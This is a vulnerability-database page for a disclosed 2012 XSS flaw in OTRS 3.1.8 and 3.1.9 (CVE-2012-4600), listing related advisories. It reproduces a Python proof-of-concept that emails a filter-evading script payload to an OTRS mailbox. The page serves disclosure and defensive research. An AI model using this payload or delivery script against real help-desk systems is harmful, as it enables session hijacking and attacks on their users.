Vulners
Lucene search
OTRS Open Technology Real Services 3.1.8 / 3.1.9 XSS
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | otrs -- XSS vulnerability in Firefox and Opera | 30 Aug 201200:00 | – | freebsd |
| otrs -- XSS vulnerability in Firefox and Opera could lead to remote code execution | 30 Aug 201200:00 | – | freebsd |
 | CVE-2012-4600 | 18 Oct 201200:00 | – | circl |
 | CVE-2012-4600 | 31 Aug 201214:00 | – | cve |
 | CVE-2012-4600 | 31 Aug 201214:00 | – | cvelist |
 | CVE-2012-4600 | 31 Aug 201214:00 | – | debiancve |
 | Debian DSA-2536-1 : otrs2 - XSS | 31 Aug 201200:00 | – | nessus |
| FreeBSD : otrs -- XSS vulnerability in Firefox and Opera (95a69d1a-52a5-11e2-a289-1c4bd681f0cf) | 2 Jan 201300:00 | – | nessus |
| FreeBSD : otrs -- XSS vulnerability in Firefox and Opera could lead to remote code execution (d60199df-7fb3-11e2-9c5a-000d601460a4) | 26 Feb 201300:00 | – | nessus |
| Mandriva Linux Security Advisory : otrs (MDVSA-2013:112) | 20 Apr 201300:00 | – | nessus |
10
`#!/usr/bin/python
'''
Author: Mike Eduard - Znuny - Enterprise Services for OTRS
Product: OTRS Open Technology Real Services
Version: 3.1.8 and 3.1.9
Vendor Homepage: http://otrs.org
CVE: 2012-4600
Timeline:
22 Aug 2012: Vulnerability reported to vendor and CERT
23 Aug 2012: Response received from CERT and vendor
28 Aug 2012: Update from vendor to have it fixed and released on 30 Aug 2012
30 Aug 2012: Update: vulnerability patched
http://www.kb.cert.org/vuls/id/511404
http://znuny.com/#!/advisory/ZSA-2012-02
http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-02/
31 Aug 2012: Public Disclosure
Installed On: Windows Server 2008 R2 & Open SUSE 12.1
Client Test OS: Window 7 Pro SP1 (x86)
Browser Used: Firefox 14 & Opera 12.01
Injection Point: HTML Email
Injection Payload(s):
1: <s<script>...</script><script>...<cript type="text/javascript">
2: document.write("Hello World!");
3: alert('Mike was here!');;
4: </s<script>//<cript>
'''
import smtplib, urllib2
payload = """<s<script>...</script><script>...<cript type="text/javascript">
document.write("Hello World!");
alert(123);;
</s<script>//<cript>
"""
def sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: [email protected]\n"
msg += "To: [email protected]\n"
msg += 'Date: Today\r\n'
msg += "Subject: Offensive Security\n"
msg += "Content-type: text/html\n\n"
msg += "XSS" + payload + "\r\n\r\n"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()
username = "[email protected]"
password = "123456"
dstemail = "[email protected]"
frmemail = "[email protected]"
smtpsrv = "127.0.0.1"
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2012 00:00Current
EPSS0.06222